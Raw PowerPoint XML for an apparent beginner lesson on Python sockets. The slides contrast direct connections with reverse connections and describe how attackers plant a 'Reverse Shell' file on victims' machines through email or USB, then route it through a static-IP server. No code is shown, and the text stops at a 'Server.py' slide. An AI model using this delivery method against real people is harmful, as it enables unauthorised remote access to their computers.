              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– receives the message and decodes the message into its system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– closes the socket once all task completed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181152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A111-BD6C-4AC3-8EDC-042CD84FFE8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="442743"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct Connections</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F90CEA-6772-4897-825B-BF8650702F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958788" y="1020933"/>
            <a:ext cx="10515600" cy="2579820"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>How the connection happens?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Consider, you are located in India and your friend is living in America, and your friends computer has run into a problem, and he/she wants you to fix his/her computer, so you will connect to its computer using command shell or any other software's such as TeamViewer, etc. and fix his/her computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We first create socket on our computer which basically means opening up a line of communication between computer and then we bind our host &amp; port to the socket and send the request to friend on this IP address, if he accepts our request then we will be remotely able to access his/her computer using our command prompt/terminal and fix his problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>So, for direct connection, we require IP address of our computer and friends computer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541CD811-541D-4277-9D09-5ADEACF88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741" y="4136996"/>
            <a:ext cx="1802167" cy="18021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DC582815-6896-4EF0-804A-0104B9003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2807" y="4101485"/>
            <a:ext cx="1802167" cy="180216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F98DF7B-671A-4471-A847-921158521A41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4850106" y="4484081"/>
            <a:ext cx="2673552" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host /IP address + Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69ED9E8-58E6-4EF8-B13A-B7D00DFAC8EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572136" y="4622580"/>
            <a:ext cx="759375" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8339766A-8935-4F09-818C-7CFE4188FDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193181" y="4558658"/>
            <a:ext cx="995785" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Friend</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Arrow: Curved Down 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C22752F-E913-4958-95D5-02CFBB5BDA12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4236811" y="3755113"/>
            <a:ext cx="3268150" cy="813275"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 40044"/>
              <a:gd name="adj3" fmla="val 3734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128899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B01D-E935-44BB-BEEE-13D9728D662C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365126"/>
            <a:ext cx="10515600" cy="478254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems with direct connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{066477AF-4327-4079-A357-25FB5EDD48E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1372864"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is difficult to get IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if we get his IP address , the IP address is Dynamic IP so its always changing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even we could get regular updates to the dynamic IP address the computer has bunch of firewalls which makes it impossible to get to his computer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928014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A9D9C-36CA-4AB2-A24A-5FDF4893FCE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="433865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Connection </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3BE1CF-5D14-447A-B600-8EB0D4348B97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1162975"/>
            <a:ext cx="10515600" cy="3817398"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In Reverse connection, instead of trying to initiate or start connection from hackers computer, the connection is initiated from victims computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Hackers basically create a python file called “Reverse Shell” and in that file and in that file, IP address &amp; Port no of hacker computer is stored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Then they send this file to victims computer via email or usb and when the victim opens this file, it creates a reverse connection to hacker computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Now because, victim is starting the connection, the hacker doesn’t really have to worry about IP address of victim computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>So, even if IP address is dynamic, it doesn’t matter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Because as every time IP address changes, the file installed  on victim computer calibrates accordingly.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29697BBE-E691-4429-BA3E-FDB435FE9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992" y="5055833"/>
            <a:ext cx="1802167" cy="18021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B3556252-BE7B-4E29-8A2C-273FC368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0058" y="5020322"/>
            <a:ext cx="1802167" cy="18021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A4384D3-D11C-4B89-822D-5F422C2B978B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5267357" y="5402918"/>
            <a:ext cx="2673552" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host /IP address + Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B56BEFC-F9EF-4FD9-A6DB-E521D15025C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2989387" y="5541417"/>
            <a:ext cx="759375" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00C821F1-0FED-4F92-BE6F-07382139B8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610432" y="5477495"/>
            <a:ext cx="995785" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Friend</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Arrow: Curved Down 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8960DBA8-9275-4689-8983-04E8399BD9B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5048208" y="5956916"/>
            <a:ext cx="2168539" cy="646332"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 40044"/>
              <a:gd name="adj3" fmla="val 3734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045835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25A971-C790-4D27-B6ED-C36045829163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772357" y="976544"/>
            <a:ext cx="10581443" cy="5200419"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>But there is still one more problem to solve, the hackers computer still has dynamic IP address, so the address stored in the file will be useless after sometime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>To mitigate this problem, hackers created a server and they store the IP address of the server in the reverse shell file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD28FBA-873C-483E-9BF3-E70A21E81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859" y="3928369"/>
            <a:ext cx="1802167" cy="18021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C6E32D10-E945-4EF5-9607-BBCEA682D0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925" y="3892858"/>
            <a:ext cx="1802167" cy="18021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769C81D-A06A-446E-A912-DDE9E5E5C171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759224" y="4275454"/>
            <a:ext cx="2673552" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host /IP address + Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F378AF6-6F54-4388-8198-5F738B078D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2345940" y="4367787"/>
            <a:ext cx="1062727" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A719A6-9C2C-4074-9A68-1657AD6671EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8102299" y="4350031"/>
            <a:ext cx="1003801" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Arrow: Curved Down 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346DFB17-001A-488E-A264-9E429216321B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4540075" y="4829452"/>
            <a:ext cx="2168539" cy="646332"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 40044"/>
              <a:gd name="adj3" fmla="val 3734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834400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19C90-B062-4BB5-85B5-16FC69C54CDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="496009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Server ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4FAC48-9846-48AA-91E9-BA3C3A59374F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1136342"/>
            <a:ext cx="10515600" cy="5040621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A server or a cloud server is just a remote computer that never gets turned off. Because it is never turned off, people over the internet can access it anytime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A server also has a static IP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1551192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9494-D741-4916-9435-071340C25C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518604" y="157071"/>
            <a:ext cx="10515600" cy="416110"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{171CA371-86CE-4079-897E-927F5022289E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250794" y="662262"/>
            <a:ext cx="6094520" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
